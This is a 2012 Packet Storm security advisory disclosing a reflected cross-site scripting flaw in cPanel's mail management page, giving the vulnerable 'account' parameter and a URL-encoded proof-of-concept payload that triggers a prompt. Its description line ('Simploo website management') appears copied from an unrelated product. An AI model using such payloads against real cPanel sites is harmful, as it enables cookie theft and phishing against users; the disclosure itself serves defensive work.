C-Panel Cross Site Scripting

2012-12-24T00:00:00
ID PACKETSTORM:119071
Type packetstorm
Reporter Rafay Baloch
Modified 2012-12-24T00:00:00

Description

                                        
                                            `CPanel Non Persistent XSS  
  
Details  
=============  
Product: Cpanel  
Security-Risk: High  
Remote-Exploit: yes  
Vendor-URL: http://www.cpanel.net  
Advisory-Status: NotPublished  
  
Credits  
=============  
Discovered by: Rafay Baloch of RafayHackingArticles(RHA)  
  
Affected Products:  
=============  
Cpanel's Latest Version  
  
Description  
=============  
"Simploo website management."  
  
More Details  
=============  
I have discsovered a non persistent Cross site scripting (XSS) inside  
Cpanel,  
the vulnerability can be easily exploited and can be used to steal cookies,  
perform  
phishing attacks and other various attacks compromising the security of a  
user.  
  
Proof of Concept  
=============  
Log into your CPanel accoutn and navigate to the following link:  
  
https://localhost/frontend/x3/mail/manage.html?account=  
  
Now insert your xss payload inside account parameter.  
  
Exploit  
=============  
  
https://localhost/frontend/x3/mail/manage.html?account=%22%3E%3Cimg%20src=x%20onerror=prompt%28/XSSBYRAFAY/%29;%3E  
  
Solution  
=============  
Edit the source code to ensure that input is properly sanitised.  
  
Timeline  
================  
  
Use of terms  
================  
  
  
--   
Warm Regards,  
Rafay Baloch  
  
http://rafayhackingarticles.net  
http://techlotips.com  
`